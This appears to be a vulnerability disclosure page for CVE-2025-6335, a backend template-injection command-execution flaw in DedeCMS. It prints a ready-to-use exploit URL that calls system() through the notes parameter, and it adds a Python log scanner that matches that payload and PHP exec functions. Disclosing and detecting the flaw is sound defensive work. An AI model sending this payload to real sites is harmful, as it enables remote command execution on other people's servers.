
CVE-2025-6335 PoC — DesDev DedeCMS Injection Vulnerability

Associated Vulnerability
Title: DesDev DedeCMS Injection Vulnerability (CVE-2025-6335)
Description: DesDev DedeCMS (织梦 Content Management System) is a PHP-based open-source content management system (CMS) from the Chinese company DesDev (卓卓). It provides content publishing, content management, content editing and content retrieval functions. DesDev DedeCMS 5.7.2 and earlier contain an injection vulnerability: incorrect handling of the `notes` parameter in the file /include/dedetag.class.php leads to command injection.
Description: CVE report
Readme
## Title: Template injection command execution vulnerability in dedeCMS 5.7 sp2

**BUG_Author:** Ewoji

**Affected Version:**  dedeCMS < 5.7.2

**Vendor:** [Shanghai Zhuozhuo Network Technology Co., LTD](https://www.dedecms.com/)

**Software:** [dedeCMS](https://www.dedecms.com/download#download)

**Vulnerability Files:**
- `/include/dedetag.class.php`

## Description:

1. **After installation, log in to the admin backend**
   - Use the default account and password admin/admin

2. **Exploiting the Template**
   - Access the `dede/co_get_corule.php` interface
   - Pass the parameter `/dede/co_get_corule.php?notes={dede:"); system('calc'); ///}&job=1`; requesting it twice like this executes the command

3. **Verifying the Exploit:**
   - If the injection succeeds, the attacker can execute arbitrary commands

## Proof of Concept:

```
/dede/co_get_corule.php?notes={dede:");system('calc');///}&job=1
```
Requesting this URL twice executes the command.
Detail: [CVE-2025-6335-dedeCMS后台模板注入RCE](https://ewoji.cn/2025/06/20/CVE-2025-6335-dedeCMS%E5%90%8E%E5%8F%B0%E6%A8%A1%E6%9D%BF%E6%B3%A8%E5%85%A5RCE/)
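For defenders, the indicators in the write-up above (the `/dede/co_get_corule.php` endpoint and a `notes` value that breaks out of a `{dede:...}` tag into a PHP call) are enough to flag exploitation attempts in web-server access logs. The following detection script is an added example; it is not part of Ewoji's write-up or of DedeCMS. The log lines are constructed for illustration, and the exec-family function list (`system`, `exec`, `passthru`, `shell_exec`) is an assumption that generalizes slightly beyond the single `system('calc')` call shown on the page.

```python
"""Added example: flag access-log requests matching the CVE-2025-6335
write-up's pattern. Sample log lines below are constructed, not real."""
import re
from urllib.parse import urlsplit, parse_qs

VULN_PATH = "/dede/co_get_corule.php"  # endpoint named in the write-up

# A {dede: tag whose name position is taken by a quote or paren, i.e. the
# attribute-breakout shape of the published payload  {dede:");...
TAG_BREAKOUT = re.compile(r'\{dede:\s*["\')]')

# PHP exec-family call inside the notes value (assumed list; the page shows
# only system(...)).
PHP_CALL = re.compile(r'\b(system|exec|passthru|shell_exec)\s*\(', re.I)

# Apache/nginx "combined"-style line: client, timestamp, request, status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: one exploitation attempt, one benign request to
# the same endpoint, one unrelated request.
SAMPLE_LOG = """\
10.0.0.5 - - [20/Jun/2025:10:01:02 +0800] "GET /dede/co_get_corule.php?notes=%7Bdede%3A%22%29%3Bsystem%28%27calc%27%29%3B%2F%2F%2F%7D&job=1 HTTP/1.1" 200 512
10.0.0.6 - - [20/Jun/2025:10:01:10 +0800] "GET /dede/co_get_corule.php?notes=test+rule&job=1 HTTP/1.1" 200 512
10.0.0.7 - - [20/Jun/2025:10:02:00 +0800] "GET /dede/index.php HTTP/1.1" 200 2048
"""


def analyse_line(line):
    """Return a finding dict for a suspicious request, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("url"))
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes the value once, so the regexes see {dede:...
    notes = parse_qs(parts.query).get("notes", [""])[0]
    reasons = []
    if TAG_BREAKOUT.search(notes):
        reasons.append("template tag breakout in notes")
    if PHP_CALL.search(notes):
        reasons.append("PHP exec-family call in notes")
    if not reasons:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "status": m.group("status"),
        "notes": notes,
        "reasons": reasons,
    }


def scan(log_text):
    """Run analyse_line over every line and collect the findings."""
    return [f for f in (analyse_line(l) for l in log_text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Because the write-up says the request must be sent twice, a second request with the same `notes` value from the same client within a short window is a useful corroborating signal; the script reports each request independently so that correlation can be done in the SIEM.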
File Snapshot

```
[4.0K] /data/pocs/ad9b23b9cb5b5ee16a179834209e7985910068e2
└── [1.1K] README.md

0 directories, 1 file
```